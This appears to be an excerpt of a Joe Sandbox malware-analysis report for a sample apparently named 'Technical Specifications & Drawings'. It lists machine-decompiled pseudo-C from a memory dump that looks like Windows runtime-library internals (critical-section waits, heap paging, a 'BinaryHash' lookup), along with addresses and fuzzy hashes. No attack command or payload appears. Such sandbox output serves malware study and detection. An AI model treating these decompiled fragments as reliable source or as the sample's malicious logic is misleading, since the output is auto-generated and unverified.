				_t103 = _t102 | 0xffffffff;
				if( *0x1897bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017E97C0();
				}
				if( *0x18979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E017D1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E017C7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0183FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017E9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E017DE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E017FDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1896901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1896901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017E9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017E95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E017C7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E017C7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01827016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0183FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1895350;
							if(_t109 != 0x1895350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0183FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01835720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                  0x017a2d8a
                                                  0x017a2d8a
                                                  0x017a2d92
                                                  0x017a2d96
                                                  0x017a2d9e
                                                  0x017a2da0
                                                  0x017a2da3
                                                  0x017a2da5
                                                  0x017a2da8
                                                  0x017a2dab
                                                  0x017a2db2
                                                  0x017ff9aa
                                                  0x017ff9ab
                                                  0x017ff9ae
                                                  0x017ff9ae
                                                  0x017a2db8
                                                  0x017a2dc2
                                                  0x017ff9b9
                                                  0x017ff9be
                                                  0x017ff9bf
                                                  0x017ff9bf
                                                  0x017a2dcf
                                                  0x017ff9c9
                                                  0x017a2dd5
                                                  0x017a2dd5
                                                  0x017a2dd5
                                                  0x017a2dde
                                                  0x017a2de1
                                                  0x017a2e70
                                                  0x017a2e72
                                                  0x017a2e72
                                                  0x017a2de7
                                                  0x017a2deb
                                                  0x017a2e7c
                                                  0x017a2e83
                                                  0x017a2e85
                                                  0x017a2e8b
                                                  0x017a2e8d
                                                  0x017a2e92
                                                  0x017a2e92
                                                  0x017a2e85
                                                  0x017a2df1
                                                  0x017a2df7
                                                  0x017a2df9
                                                  0x017a2df9
                                                  0x017a2dfc
                                                  0x017a2dff
                                                  0x017a2e02
                                                  0x00000000
                                                  0x017a2e05
                                                  0x017a2e0c
                                                  0x017ff9d9
                                                  0x017a2e12
                                                  0x017a2e12
                                                  0x017a2e12
                                                  0x017a2e1a
                                                  0x017ff9e3
                                                  0x017ff9e9
                                                  0x017ff9f0
                                                  0x017ff9f6
                                                  0x017ff9f8
                                                  0x017ff9f8
                                                  0x017ff9f0
                                                  0x017a2e23
                                                  0x017ffa02
                                                  0x017ffa03
                                                  0x017ffa05
                                                  0x017ffa06
                                                  0x00000000
                                                  0x017a2e29
                                                  0x017a2e29
                                                  0x017a2e2e
                                                  0x017a2e34
                                                  0x017a2e3e
                                                  0x00000000
                                                  0x00000000
                                                  0x017a2e44
                                                  0x017a2e47
                                                  0x017a2e4d
                                                  0x00000000
                                                  0x00000000
                                                  0x017a2e4f
                                                  0x017a2e54
                                                  0x00000000
                                                  0x00000000
                                                  0x017a2e5a
                                                  0x017a2e5f
                                                  0x017a2e9a
                                                  0x017a2ea4
                                                  0x017a2ea5
                                                  0x017a2ea8
                                                  0x017a2eaf
                                                  0x017a2eb2
                                                  0x017a2eb5
                                                  0x017ffae9
                                                  0x017ffaeb
                                                  0x017ffaed
                                                  0x017ffaef
                                                  0x017ffaf7
                                                  0x017ffaf8
                                                  0x017ffafd
                                                  0x017ffaff
                                                  0x017ffb04
                                                  0x017ffb04
                                                  0x017ffaff
                                                  0x017a2ec0
                                                  0x017a2ec4
                                                  0x017a2ec6
                                                  0x017a2ec8
                                                  0x017ffb14
                                                  0x017ffb18
                                                  0x017ffb1e
                                                  0x017ffb21
                                                  0x017ffb21
                                                  0x017a2ece
                                                  0x017a2ece
                                                  0x017a2ece
                                                  0x017a2ed7
                                                  0x017a2e61
                                                  0x017a2e63
                                                  0x017ffa6b
                                                  0x017ffa71
                                                  0x017ffa76
                                                  0x017ffa78
                                                  0x017ffa8a
                                                  0x017ffa7a
                                                  0x017ffa83
                                                  0x017ffa83
                                                  0x017ffa8f
                                                  0x017ffa91
                                                  0x017ffa97
                                                  0x017ffa9d
                                                  0x017ffaa4
                                                  0x017ffaaa
                                                  0x017ffaaf
                                                  0x017ffab1
                                                  0x017ffac3
                                                  0x017ffab3
                                                  0x017ffabc
                                                  0x017ffabc
                                                  0x017ffac8
                                                  0x017ffacb
                                                  0x017ffadf
                                                  0x017ffadf
                                                  0x017ffacb
                                                  0x017ffaa4
                                                  0x017ffa91
                                                  0x017a2e6f
                                                  0x017a2e6f
                                                  0x017a2e5f
                                                  0x017ffa13
                                                  0x017ffa15
                                                  0x017ffa17
                                                  0x017ffa1f
                                                  0x017ffa21
                                                  0x017ffa22
                                                  0x017ffa25
                                                  0x017ffa28
                                                  0x017ffa2f
                                                  0x017ffa2f
                                                  0x017ffa2a
                                                  0x017ffa2a
                                                  0x017ffa2a
                                                  0x017ffa31
                                                  0x017ffa34
                                                  0x017ffa36
                                                  0x017ffa3c
                                                  0x017ffa3e
                                                  0x017ffa41
                                                  0x017ffa43
                                                  0x017ffa45
                                                  0x017ffa45
                                                  0x017ffa41
                                                  0x017ffa3c
                                                  0x017ffa4a
                                                  0x017ffa4f
                                                  0x017ffa51
                                                  0x017ffa53
                                                  0x017ffa56
                                                  0x017ffa5b
                                                  0x017ffa5e
                                                  0x00000000
                                                  0x017ffa5e
                                                  0x017a2e23

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Re-Waiting
                                                  • API String ID: 0-316354757
                                                  • Opcode ID: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                  • Instruction ID: 3af340d522a7e3ea23999dedcdd3ef0ea535011ae7c9c09c8d2351dfc3d8a7da
                                                  • Opcode Fuzzy Hash: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                  • Instruction Fuzzy Hash: 72612832A046059BDB32DF6CC848B7EF7A0EB85714F58029DD711973C2CB349E848792
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01870EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E01870EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0186FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01871074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E017E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0186A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0186A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1898b04 >> 0x14) + (_v44 -  *0x1898b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E017C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0186138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E017C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0185FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1898724 & 0x00000008) != 0) {
						E018652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018715B5(0x1898ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                  0x01870eb7
                                                  0x01870eb9
                                                  0x01870ec0
                                                  0x01870ec2
                                                  0x01870ecd
                                                  0x0187105b
                                                  0x0187105b
                                                  0x01871061
                                                  0x01871066
                                                  0x01871066
                                                  0x0187106b
                                                  0x01871073
                                                  0x01871073
                                                  0x01870ed3
                                                  0x01870ed6
                                                  0x01870edc
                                                  0x01870ee0
                                                  0x01870ee7
                                                  0x01870ef0
                                                  0x01870ef5
                                                  0x01870efa
                                                  0x01870efc
                                                  0x01870efd
                                                  0x01870f03
                                                  0x01870f04
                                                  0x01870f06
                                                  0x01870f07
                                                  0x01870f09
                                                  0x01870f0e
                                                  0x01870f14
                                                  0x01870f23
                                                  0x01870f2d
                                                  0x01870f34
                                                  0x01870f34
                                                  0x01870f14
                                                  0x01870f52
                                                  0x00000000
                                                  0x00000000
                                                  0x01870f58
                                                  0x01870f73
                                                  0x01870f74
                                                  0x01870f79
                                                  0x01870f7d
                                                  0x01870f80
                                                  0x01870f86
                                                  0x01870fab
                                                  0x01870fb5
                                                  0x01870fc6
                                                  0x01870fd1
                                                  0x01870fe3
                                                  0x01870fd3
                                                  0x01870fdc
                                                  0x01870fdc
                                                  0x01870feb
                                                  0x01871009
                                                  0x01871009
                                                  0x01871015
                                                  0x01871027
                                                  0x01871017
                                                  0x01871020
                                                  0x01871020
                                                  0x0187102f
                                                  0x0187103c
                                                  0x0187103c
                                                  0x01871048
                                                  0x01871050
                                                  0x01871050
                                                  0x01871055
                                                  0x00000000
                                                  0x01871055
                                                  0x01870f88
                                                  0x01870f9e
                                                  0x01870fa2
                                                  0x01870fa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01870fa9
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                  • Instruction ID: 5985b3f61cda4dffb816ec51dbd69074874953d95e56f80dd704a32f8d83fc7b
                                                  • Opcode Fuzzy Hash: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                  • Instruction Fuzzy Hash: B7518C713043429FE325DF28D888B1BBBE9EBC5704F04092CFA96D7691D671EA45CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E017DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E017C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017E95D0();
							goto L11;
						} else {
							_t109 = L017C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017E95D0();
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                  0x017df0d3
                                                  0x017df0d9
                                                  0x017df0e0
                                                  0x017df0e7
                                                  0x017df0f2
                                                  0x017df0f4
                                                  0x017df0f8
                                                  0x017df100
                                                  0x017df108
                                                  0x017df10d
                                                  0x017df115
                                                  0x017df116
                                                  0x017df11f
                                                  0x017df123
                                                  0x017df124
                                                  0x017df12c
                                                  0x017df130
                                                  0x017df134
                                                  0x017df13d
                                                  0x017df144
                                                  0x017df14b
                                                  0x017df152
                                                  0x0181bab0
                                                  0x0181bab0
                                                  0x017df158
                                                  0x017df158
                                                  0x017df15a
                                                  0x017df160
                                                  0x017df165
                                                  0x017df166
                                                  0x017df16f
                                                  0x017df173
                                                  0x0181baa7
                                                  0x0181baa7
                                                  0x0181baab
                                                  0x00000000
                                                  0x017df179
                                                  0x017df18d
                                                  0x017df191
                                                  0x0181baa2
                                                  0x00000000
                                                  0x017df197
                                                  0x017df19b
                                                  0x017df1a2
                                                  0x017df1a9
                                                  0x017df1af
                                                  0x017df1b2
                                                  0x017df1b6
                                                  0x017df1b9
                                                  0x017df1c4
                                                  0x017df1d8
                                                  0x017df1df
                                                  0x017df1e3
                                                  0x017df1eb
                                                  0x017df1ee
                                                  0x017df1f4
                                                  0x017df20f
                                                  0x0181bab7
                                                  0x0181babb
                                                  0x0181bacc
                                                  0x0181bad1
                                                  0x017df215
                                                  0x017df218
                                                  0x017df226
                                                  0x017df22b
                                                  0x00000000
                                                  0x017df22b
                                                  0x017df1f6
                                                  0x017df1f6
                                                  0x017df1f9
                                                  0x017df1fb
                                                  0x017df1fb
                                                  0x017df1f4
                                                  0x017df191
                                                  0x017df173
                                                  0x017df152
                                                  0x017df203

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction ID: f3b6b212d9d1973919cb08100380ccadc0a47dc0270ed9ae35e08c132ed55ea8
                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                  • Instruction Fuzzy Hash: 93516A725047159BC320DF29C844A6BFBF8FF88710F00892DFA9697690E7B4E904CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01823540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E01823540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x189d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E017E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01823706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E017EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01823540;
						E017EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E017FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01830C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E017E97C0();
					}
					return E017EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01823971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01823884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E017EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E017E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01823787(_a4,  &_v352, _t80);
						}
					}
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                  0x01823552
                                                  0x0182355a
                                                  0x0182355d
                                                  0x01823566
                                                  0x01823567
                                                  0x0182357e
                                                  0x0182358f
                                                  0x018235a1
                                                  0x018235a5
                                                  0x0182366b
                                                  0x0182366b
                                                  0x0182366d
                                                  0x01823672
                                                  0x01823679
                                                  0x01823685
                                                  0x0182368d
                                                  0x0182369d
                                                  0x018236a7
                                                  0x018236b8
                                                  0x018236c6
                                                  0x018236c7
                                                  0x018236dc
                                                  0x018236e1
                                                  0x018236e7
                                                  0x018236e9
                                                  0x018236e9
                                                  0x01823703
                                                  0x01823703
                                                  0x018235b5
                                                  0x018235c0
                                                  0x018235c4
                                                  0x00000000
                                                  0x00000000
                                                  0x018235ca
                                                  0x018235d7
                                                  0x018235e2
                                                  0x018235e6
                                                  0x018235e8
                                                  0x018235f5
                                                  0x018235fa
                                                  0x01823603
                                                  0x01823604
                                                  0x01823609
                                                  0x0182360a
                                                  0x01823612
                                                  0x01823613
                                                  0x0182361e
                                                  0x01823622
                                                  0x01823628
                                                  0x0182362f
                                                  0x0182362f
                                                  0x01823636
                                                  0x01823638
                                                  0x0182363b
                                                  0x01823642
                                                  0x01823642
                                                  0x01823636
                                                  0x01823657
                                                  0x01823657
                                                  0x0182365c
                                                  0x01823662
                                                  0x01823669
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                  • Instruction ID: 6e81199075f850ea0a6526243506dd06aae851c6b65760cf5b778ba678792c9d
                                                  • Opcode Fuzzy Hash: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                  • Instruction Fuzzy Hash: DD4143F2D0052DABDF219A54CC94F9EB7BCAB48714F0045A5EB09AB241DB349F888F95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018705AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 71%
                                                  			E018705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0186A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0186A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01871293(_t79, _v40, E018707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E017C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0186138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                  0x018705c5
                                                  0x018705ca
                                                  0x018705d3
                                                  0x018706db
                                                  0x018706db
                                                  0x018706dd
                                                  0x018706e3
                                                  0x018706e3
                                                  0x018705dd
                                                  0x018705e7
                                                  0x018705f6
                                                  0x01870600
                                                  0x01870607
                                                  0x01870610
                                                  0x01870615
                                                  0x0187061a
                                                  0x0187061c
                                                  0x0187061e
                                                  0x01870624
                                                  0x01870625
                                                  0x01870627
                                                  0x01870628
                                                  0x01870631
                                                  0x01870640
                                                  0x0187064d
                                                  0x01870654
                                                  0x01870654
                                                  0x01870631
                                                  0x0187066d
                                                  0x01870674
                                                  0x00000000
                                                  0x00000000
                                                  0x01870692
                                                  0x0187069e
                                                  0x018706b0
                                                  0x018706a0
                                                  0x018706a9
